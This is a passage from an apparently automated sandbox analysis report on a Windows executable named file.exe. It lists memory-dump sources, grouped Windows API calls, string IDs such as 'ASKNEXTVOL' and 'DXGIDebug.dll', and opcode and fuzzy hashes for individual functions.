                                                                                        • Instruction Fuzzy Hash: 44518F32F18A5185E710CB6AD4443ED7BB1BBA8798F048135EE5E97A98EF38E156C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                        • Instruction ID: 6c6e3ddcd5fd53b680b087ddd745aea5c36fba74efe3550d41c17d4d1fc9dd86
                                                                                        • Opcode Fuzzy Hash: b7eca4d0914b4f3ce7b9457829877c74e6e00994a5cd88f9d96bed53318f8e63
                                                                                        • Instruction Fuzzy Hash: 5F41C021F0964689FB14DF2794402B92A91EFA8BA8F154636FA7DC7BD5EF3CE1418300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction ID: 97dc526d5362932d3f1aafbdfdd23739820beed5914e92b97994abafc17c48f0
                                                                                        • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction Fuzzy Hash: 49418062F09A4281FB25DF17A8046766A96BBA8B90F194535ED3ECB7C4FE3CE440C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction ID: 298c8e9bfab06b0713efa80dc6e257825d81d94e654d9ac11445185202402db5
                                                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction Fuzzy Hash: 82116D76F18B0781F754912EE5463F91941BFF53A0E884234FA7ECA6D6BE2CA4C04205
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: Message$DispatchObjectPeekSingleTranslateWait
• String ID:
• API String ID: 3621893840-0
• Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
• Instruction ID: ae87fd68a75ee72884571eb809a0e94011dd11e526a44000cbebd07b2fb08fda
• Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
• Instruction Fuzzy Hash: AFF0FF21F2894682F750D722E895A762651FFF4B05F441430F55EC19D4AE2CE589CB01
Similarity
• API ID: __except_validate_context_recordabort
• String ID: csm$csm
• API String ID: 746414643-3733052814
• Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
• Instruction ID: fb8f50a45f59ecbf5d7bdc35105d5bb87fb3e267df9febfb0ef6e0f1aa567481
• Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
• Instruction Fuzzy Hash: B371A072E08A9186D760CF26945077D7FA0EBA5B88F148135EA5C8BBC9EF3CD495C740
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: $*
• API String ID: 3215553584-3982473090
• Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
• Instruction ID: c2b24b8356bc50ec0873c24eb6cfebf5210a86abc8c716a4bfe2840e73f44ea9
• Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
• Instruction Fuzzy Hash: 93516072D1DA428AE768CE2A844537C3FA0FBA5F18F181175E66A813D9EF3CE481C605
Similarity
• API ID: ByteCharMultiWide$StringType
• String ID: $%s
• API String ID: 3586891840-3791308623
• Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
• Instruction ID: 20afcdede170eb952a539786318fc66027baccefac4cfb52f9a080ac33a41d98
• Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
• Instruction Fuzzy Hash: 36418722F5978145FB61CF2AD8002E966A1FBA4BA8F444636EE2DC77C5EF3CE4458300
Similarity
• API ID: CreateFrameInfo__except_validate_context_recordabort
• String ID: csm
• API String ID: 2466640111-1018135373
• Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
• Instruction ID: 221f4ebd8f719c965ff71bb06d031f5c3a3508714e724436d277089381a3d905
• Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
• Instruction Fuzzy Hash: 1A513B76E1974186D720EB57E04126E7BA4FBD9B90F140534EB9D87B96EF38E4A0CB00
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
• Instruction ID: 242132a72db69a8d8fd46edf2ada8c202bc538cfc2a0e79451a2fa27bab4f776
• Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
• Instruction Fuzzy Hash: 6D419122B18A8182EB20CF2AE4443A96B61FBE8794F544131FE5DC7B94EF7CD455C740
Similarity
• API ID: ObjectRelease
• String ID:
• API String ID: 1429681911-3916222277
• Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
• Instruction ID: 83a1bb13cd6ec3d429e49c06f9a24805d6eca3c7012849bdd716dd94d04b790a
• Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
• Instruction Fuzzy Hash: F7310A35B08B4286DB08DF13BC1862A7B61F799BD1F404435FD5A83B98DE7CE4498B00
APIs
• InitializeCriticalSection.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8BB
• CreateSemaphoreW.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8CB
• CreateEventW.KERNEL32(?,?,?,00007FF6FE1A317F,?,?,00001000,00007FF6FE18E51D), ref: 00007FF6FE19E8E4
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
• Instruction ID: 9a5074e30995db1ae5f4d7d084f6961591b0adb41fc92e2b6b6fb792ddb63f55
• Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
• Instruction Fuzzy Hash: 9421D832F1564186F710CF26D4847ED3AD2EBE4B08F188034EA2D8A2D5EF7EA445C780
Similarity
• API ID: CapsDeviceRelease
• String ID:
• API String ID: 127614599-3916222277
• Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
• Instruction ID: 8d3715efcd97103cbe57546f640386d4e66b1d7802299dfa9330b58875e83d56
• Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
• Instruction Fuzzy Hash: 96E08620F08A4282EB089B76B98903B1751978CBD0F154035F92A87B94DD7CD8844300
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$FileTime
• String ID:
• API String ID: 1137671866-0
• Opcode ID: 20228944a5afb91411426e12e74fd9f957feffc0ed5156b7d75ac355226ac421
• Instruction ID: 9058afbc336cc42046c5a1bd24dead0432d9ff46fc9f1a49f667b849efea9083
• Opcode Fuzzy Hash: 20228944a5afb91411426e12e74fd9f957feffc0ed5156b7d75ac355226ac421
• Instruction Fuzzy Hash: A6A18162E1CB8681EB10DB66E4401AD6761FBE5794F405132FA6D87AE9EF3CE648C700
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                        • Instruction ID: 27d0ad54e523d893c874be18605909386d11ed1a2a82109f9ff1a297fe6d441e
                                                                                        • Opcode Fuzzy Hash: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                        • Instruction Fuzzy Hash: A3519262F54A4295FB00DB66D4442FC2722EBE8B98F404232FA2D977D5FE28E649C340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1077098981-0
                                                                                        • Opcode ID: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                        • Instruction ID: bcccf0c085aa78e6c4f1598f691ff3d77d8f61944b40fca49e3671c05b712bbe
                                                                                        • Opcode Fuzzy Hash: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                        • Instruction Fuzzy Hash: 1D512F32A18B4286EB50CF62E8447AE7B64FBE4B84F501135FA5D97A94EF3CD548CB40
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 4141327611-0
                                                                                        • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction ID: d91f1254ed50dfe2b5179231c6db2e4b9f0ce06a87ca81d16fad9513ada80891
                                                                                        • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction Fuzzy Hash: 3041B232E0864646FB6DDA1291403B96A90EFE5B90F548135FA6DC6BD5EF7CE8418700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3823481717-0
                                                                                        • Opcode ID: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                        • Instruction ID: a1d24efa5465a7bb1b220f3aab7374784901dd6869230ccdfb9b2c7f80f26bf5
                                                                                        • Opcode Fuzzy Hash: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                        • Instruction Fuzzy Hash: 7041B262F1475184FB00CF7AE8851AC2772BBD4BA4B405231EE6E9BBD9EF38D445C200
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0B91
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0BF3
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0C2D
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID:
                                                                                        • API String ID: 1557788787-0
                                                                                        • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction ID: c1997313e536491d2f45ba08730aaead38609195bed8468b155349eb31e901c3
                                                                                        • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction Fuzzy Hash: B2215221F18B5181E724DF1B64400696AA5FBE4BD0B484174EEAEE3BD4EF3CE4528704
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$abort
                                                                                        • String ID:
                                                                                        • API String ID: 1447195878-0
                                                                                        • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction ID: edc0bf831549096f625d5b4546b38b8e58020413d87497dfd0cb02b68708be21
                                                                                        • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction Fuzzy Hash: F7018C14F0860A42FB6CEB77A65617C19A15FF8790F040538F93EC6BD6FD2CB8048201
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction ID: f7a840fbeab1aa4315ac28d49ec60fe711c9ba7db8dc1c6aa9d16dea8ead4a89
                                                                                        • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction Fuzzy Hash: 83E0E560F05A0242FF08DB73AC591361A919F98B41F444439F82E867E0FD7CB4498610
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: DXGIDebug.dll
                                                                                        • API String ID: 3668304517-540382549
                                                                                        • Opcode ID: dd85f8b639cc219206ae2105a346c9825e6d5176955616312b0425911fde27d5
                                                                                        • Instruction ID: 03acd73e37edfb1475dde9be33b4d988d8ffa27c73f56079b29006407daba357
                                                                                        • Opcode Fuzzy Hash: dd85f8b639cc219206ae2105a346c9825e6d5176955616312b0425911fde27d5
                                                                                        • Instruction Fuzzy Hash: DD718F72B14B8186EB14CB26E8403AD77A5FBA4794F444236EBAD47B99EF78D151C300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: e+000$gfff
                                                                                        • API String ID: 3215553584-3030954782
                                                                                        • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction ID: 64fb21ed9742bd7cc15cf12278d16752d9963043b1a2866d7ef69cca6891f32c
                                                                                        • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction Fuzzy Hash: DC510462F187C546E725CB36994136A6F91ABE1B90F089271EABCC7BD5EE2CE444C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                        • String ID: SIZE
                                                                                        • API String ID: 449872665-3243624926
                                                                                        • Opcode ID: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                        • Instruction ID: 2f8f39ad2c95c9ffe4a16a0765a352a7625aebfdca38fd5a133f7f2e58f6322d
                                                                                        • Opcode Fuzzy Hash: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                        • Instruction Fuzzy Hash: 634190A2E1868285FB11DB16E4413BE6751EFE57A0F504232FAAD826EAFE3DD544C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                                        • API String ID: 3307058713-1957095476
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_snwprintf
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 2650857296-834177443
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID: @
                                                                                        • API String ID: 3000768030-2766056989
                                                                                        APIs
                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FE1B1D3E), ref: 00007FF6FE1B40BC
                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FE1B1D3E), ref: 00007FF6FE1B4102
                                                                                        Strings
                                                                                        Similarity
